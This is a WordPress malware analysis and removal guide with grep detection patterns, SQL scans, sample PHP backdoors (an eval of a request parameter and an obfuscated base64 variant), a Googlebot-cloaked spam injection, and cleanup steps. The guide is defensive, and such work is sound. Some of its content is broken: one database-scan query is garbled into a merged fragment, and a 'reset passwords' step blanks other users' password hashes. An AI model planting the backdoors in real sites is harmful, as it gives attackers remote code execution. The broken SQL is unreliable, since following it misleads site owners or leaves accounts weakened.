WordPress Malware Analysis and Removal Guide

Malware infection requires methodical identification and thorough removal. Incomplete cleanup leads to reinfection. Follow this systematic approach.

Signs of Malware Infection

Visible Symptoms

• Redirects to spam sites
• Unknown content or pages
• Defaced website
• Pop-up advertisements
• Slow site performance
• Google safe browsing warnings

Hidden Indicators

• Unknown admin users
• Modified .htaccess files
• Strange cron jobs
• Unusual database entries
• Encoded PHP in files
• Unexpected file changes

Scanning for Malware

Manual File Analysis

# Find recently modified files
find /path/to/wordpress -type f -mtime -7 -name "*.php"

# Search for common malware patterns
grep -r "eval(base64_decode" /path/to/wordpress
grep -r "gzinflate(base64" /path/to/wordpress
grep -r "str_rot13" /path/to/wordpress
grep -r "\$_REQUEST\[" /path/to/wordpress/wp-content

# Find files with suspicious names
find /path/to/wordpress -name "*backdoor*"
find /path/to/wordpress -name "*.php.suspected"

Database Scanning

-- Search for injected scripts in posts
SELECT ID, post_title FROM wp_posts
WHERE post_content LIKE '% DATE_SUB(NOW(), INTERVAL 30 DAY);

-- Look for suspicious options
SELECT * FROM wp_options
WHERE option_name LIKE '%base64%'
OR option_value LIKE '%eval(%';

Common Malware Types

Backdoor Files

// Typical backdoor pattern
<?php
if(isset($_REQUEST['cmd'])){
    eval($_REQUEST['cmd']);
}
?>

// Obfuscated version
<?php @eval(@base64_decode($_POST['x'])); ?>

Spam Injection

// Hidden links injection
echo '
'.$spam_links.'
';

// Conditional injection (only for search bots)
if(strpos($_SERVER['HTTP_USER_AGENT'],'Googlebot')){
    include('spam.php');
}

Removal Process

Step 1: Isolate the Site

• Take site offline or enable maintenance mode
• Change all passwords immediately
• Revoke all access tokens
• Backup current state for analysis

Step 2: Clean Core Files

# Download fresh WordPress
wget https://wordpress.org/latest.tar.gz
tar -xzf latest.tar.gz

# Compare and replace core files
diff -rq wordpress/ infected-site/wp-admin/
diff -rq wordpress/ infected-site/wp-includes/

# Replace wp-admin and wp-includes entirely
rm -rf infected-site/wp-admin infected-site/wp-includes
cp -r wordpress/wp-admin infected-site/
cp -r wordpress/wp-includes infected-site/

Step 3: Clean wp-content

• Delete unknown plugins
• Reinstall plugins from fresh downloads
• Scan uploads for PHP files
• Check theme files against originals

Step 4: Database Cleanup

-- Remove malicious admin users
DELETE FROM wp_users WHERE ID NOT IN (/*known IDs*/);
DELETE FROM wp_usermeta WHERE user_id NOT IN (/*known IDs*/);

-- Clean infected posts
UPDATE wp_posts
SET post_content = REPLACE(post_content, 'malicious_code', '')
WHERE post_content LIKE '%malicious_code%';

-- Reset user passwords
UPDATE wp_users SET user_pass = '' WHERE user_login != 'your_admin';

Step 5: Security Hardening

• Update WordPress, plugins, themes
• Change all credentials
• Generate new security keys
• Implement security plugin
• Enable two-factor authentication

Post-Cleanup Verification

Verify Clean State

• Run security scans again
• Check Google Search Console
• Submit for malware review if blocklisted
• Monitor for reinfection

Preventing Reinfection

• Identify and fix entry point
• Update all software
• Remove unused plugins/themes
• Strengthen access controls
• Implement monitoring

Conclusion

Malware removal requires thoroughness. Clean core files, scan wp-content, check the database, and implement protections. Incomplete cleanup leads to reinfection. When in doubt, rebuild from clean backups.